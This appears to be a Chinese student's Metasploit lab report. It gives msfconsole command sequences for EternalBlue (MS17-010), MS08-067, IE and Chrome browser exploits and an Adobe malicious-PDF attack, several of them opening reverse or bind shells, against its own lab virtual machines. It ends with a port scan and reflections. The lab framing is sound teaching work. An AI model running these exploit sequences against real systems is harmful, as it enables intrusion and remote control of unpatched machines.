一、基础问题回答
1.用自己的话解释什么是exploit,payload,encode.
答:
exploit:进行渗透攻击的模块合集,相当于一个载具
payload:相当于shellcode,攻击载荷,是一串具有攻击性的代码
encode:对所需传输文件进行编码,从而可以达到免杀目的
二、实验目的
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.一个主动攻击实践,尽量使用最新的类似漏洞;
2.一个针对浏览器的攻击,尽量使用最新的类似漏洞;
3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
4.成功应用任何一个辅助模块。
三、实验过程记录
0.准备工作
(1)下载靶机
win7迅雷下载链接:ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/
windows XP迅雷下载链接:ed2k://|file|en_windows_xp_home_with_service_pack_3_x86_cd_x1492413.iso|592154624|E31A555C0AB581B8610583D2D25E93BD|/
(2)关闭靶机防火墙
(3)打开445端口
(4)查看靶机IP地址
win7:192.168.113.133
window XP:192.168.113.134
1.一个主动攻击实践,尽量使用最新的类似漏洞;
msfconsole
search scanner/smb/smb_
use 7
show options
set rhosts 192.168.113.133
run
查找对应利用漏洞模块
search exploit/windows/smb/
第19条攻击方式:ms17-010(win7)
查看靶机该漏洞:nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.113.133
选择对应MSF板块,设置靶机ip地址,执行攻击:
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.113.133
exploit
测试攻击:ipconfig
第15条攻击方式:ms08_067(XP系统)
msfconsole
search ms08_067//查找该漏洞使用的攻击模块
use exploit/windows/smb/ms08_067_netapi//进入攻击模块
show payloads
set payload generic/shell_reverse_tcp //设置payload为反向tcp连接
set RHOST 192.168.113.134//设置靶机IP (winxp ip)
set LPORT 1203 //设置攻击机端口
set LHOST 192.168.113.130//设置攻击机IP (kali ip)
exploit
2.一个针对浏览器的攻击,尽量使用最新的类似漏洞;
**查找对应利用漏洞模块 **
search exploit/windows/smb/
第117条攻击方式:ms10_018_ie_behaviors(win7)
use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/bind_tcp
set RHOSTS 192.168.113.133
set target 0
exploit
使用win7的IE浏览器访问
输入其他网址可以正常打开
第50条攻击方式:chrome_filereader_uaf(win7)
use exploit/windows/browser/chrome_filereader_uaf
set payload windows/meterpreter/reverse_tcp
set URIPATH /
set LHOST 192.168.113.130
exploit
靶机端在浏览器安装目录的文件夹开cmd输入C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入该地址,发现无法打开。
3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
msfconsole //进入控制台
search adobe //进行查找
use windows/fileformat/adobe_cooltype_sing //使用漏洞
info //查看漏洞具体信息
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 1203//设置端口号
set RHOST 192.168.113.130//设置靶机IP地址
exploit #攻击
将生成的msf文件复制到桌面上cp -r "/root/.msf4/local/msf.pdf" "/home/kali/Desktop/"
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set RHOST 192.168.113.134 //设置靶机IP地址
set LPORT 1203 //设置端口号
exploit //攻击
回连失败。
4.成功应用任何一个辅助模块。
使用PortScan进行端口扫描
use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.113.133
exploit
四、实践总结与体会
经过本次试验,我对Metasploit有了更深的理解,Metasploit完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些系统上的工作流程基本一样。它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。在进行本次实验的时候,出现了复制到window XP的pdf文件无法回连到kali虚拟机。而且对PDF回连的实现过程不是很明确。仍在查询资料解决问题。
五、离实战还缺些什么技术或步骤?
答:渗透攻击受系统、软件版本的限制比较大,而且需要关闭防火墙。这就比较难以实现。而且如何使被攻击者点击我们设定的网址和文件也是不可控的。而且许多的漏洞已经被修复。慢慢的,可利用的漏洞发现的难度越来越大。
标签:set,windows,Exp6,192.168,漏洞,exploit,应用,MSF,靶机 From: https://www.cnblogs.com/1314liyang/p/17372893.html